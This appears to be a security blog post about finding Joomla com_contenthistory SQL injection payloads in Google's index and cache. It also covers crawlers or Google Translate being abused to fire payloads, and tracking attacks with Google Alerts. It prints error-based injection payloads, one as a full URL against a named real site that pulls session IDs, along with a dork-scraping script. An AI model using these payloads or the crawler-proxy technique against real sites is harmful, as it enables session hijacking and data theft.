Using Google to detect payloads

__Google is a well-known search engine, and in the security community also famous for the “Google dorks” functionality: finding vulnerable websites using Google queries. __

Google Url Search

Exploits in the Google Url Database

Using google dorks is not new and has been discussed thoroughly, however while we were analyzing the Joomla SQL injection vulnerability on com_contenthistory, we found this URI in the results of the Google query:

Google Webcache

If we decode the URL parameters, we get this:

com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from

Please note that this specific URI is not complete, but the full request is potentially executed by Google web crawlers.

What is the issue?

This effect is interesting for three reasons:

..1. Abusing Google (or other search engines) to execute payloads ..2. Finding potentially zero days in the Google index. ..3. Getting results of exploits, such as passwords and private user data, which are cached in Google, even after the issue has been fixed

Abusing Google to execute payloads

The first technique is elaborated on in Phrack 57, 0x0a: Against the System: Rise of the Robots by Michal Zalewski. Michal uses an HTML document with links that contain payloads to potentially vulnerable webservers. When crawlers pick up on these links, they execute the payload on behalf of Michal. To quote the very founders of Google on this issue:

“[…] big difference between the web and traditional well controlled collections is that there is virtually no control over what people can put on the web. Couple this flexibility to publish anything with the enormous influence of search engines to route traffic and companies which deliberately manipulating search engines for profit become a serious problem.” — Sergey Brin, Lawrence Page “The Anatomy of a Large-Scale Hypertextual Web Search Engine” Googlebot concept, Sergey Brin, Lawrence Page, Stanford University

To expand a bit on the first issue, you could use of the Google Translate function as proxy. This allows you to skip the process of waiting for the crawlers to pick up your malicious links and execute them straight away:

CmdNsLookup

Finding exploits in the Google Index

The following script can be used to scrape Google, note that this script needs some fine-tuning:

    pi@raspberrypi ~/bitsensor $ wget http://www.catonmat.net/downlo...
    --2016-01-04 19:54:14--  http://www.catonmat.net/downlo...

    Resolving www.catonmat.net (www.catonmat.net)... 50.22.83.242
    Connecting to www.catonmat.net (www.catonmat.net)|50.22.83.242|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [application/zip]
    Saving to: `xgoogle.zip`

        [   <=>             ] 70,319       1121K/s   in 0.1s    
    2016-01-04 19:54:20 (1121 KB/s) - `xgoogle.zip` saved [70319]
    pi@raspberrypi ~/bitsensor $ unzip xgoogle.zip 
    Archive:  xgoogle.zip
    www.catonmat.net
       creating: examples/

      inflating: examples/example2.py    
      inflating: examples/example3.py    
      inflating: examples/example1.py    
       creating: programs/
      inflating: programs/google_fight2.py 

      inflating: programs/google_fight.py  
      inflating: programs/english.py     
       creating: xgoogle/
      inflating: xgoogle/browser.py      
      inflating: xgoogle/sponsoredlinks.py

      inflating: xgoogle/__init__.pyc    
      inflating: xgoogle/search.py       
      inflating: xgoogle/BeautifulSoup.pyc  
      inflating: xgoogle/googlesets.py   
      inflating: xgoogle/BeautifulSoup.py

      inflating: xgoogle/browser.pyc     
      inflating: xgoogle/search.pyc      
      inflating: xgoogle/translate.py    
      inflating: xgoogle/__init__.py     
      inflating: contributors.txt 

      inflating: projects-using-xgoogle.txt  
      inflating: readme.txt              
    pi@raspberrypi ~/bitsensor $ ls
    contributors.txt  examples  programs  projects-using-xgoogle.txt  readme.txt  xgoogle
    pi@raspberrypi ~/bitsensor $ cat GoogleSearch.py 

    from xgoogle.search import GoogleSearch, SearchError
    from threading import Thread
    from random import randint
    import time
    try:
      gs = GoogleSearch("inurl:'index.php?option=com_contenthistory'")
      gs.results_per_page = 50

      displayedResults = 0
      results = gs.get_results()
      while displayedResults < gs.num_results:
          for res in results:
            if res.url is not None:

                print res.url.encode('utf8')
            displayedResults += gs.results_per_page
            print
          time.sleep(randint(15,60))
          results = gs.get_results()

    except SearchError, e:
      print "Search failed: %s" % e

     pi@raspberrypi ~/bitsensor $ python GoogleSearch.pyhttp://hafelekar.com/en/index.php?option=com_contenthistory&view=history&list%5Bselect%5D=1+AND+extractvalue(rand()%2Cconcat(0x23%2C(SELECT+concat(session_id%2C0x23)+FROM+ugq2y_session+WHERE+userid%3D44+LIMIT+0%2C1)))--+-

Recommendation

All users of the Joomla website should be informed about the breach. Google should be contacted to get them to remove the cached page. This disables attackers’ use of Google Cache to retrieve information like username and passwords.

Using Google Alert

Google Alert is a service which sends an email when a certain query is found. For example, if we add the above mentioned Google query here, we receive an email with which site is added, every time a new page is indexed. Using this methodology we are able to get a good view on which kind of payloads are used by cyber criminals.

Google Alerts

In the screenshot an example email of Google Alerts. Please note in this case another dork is used:

Google Alerts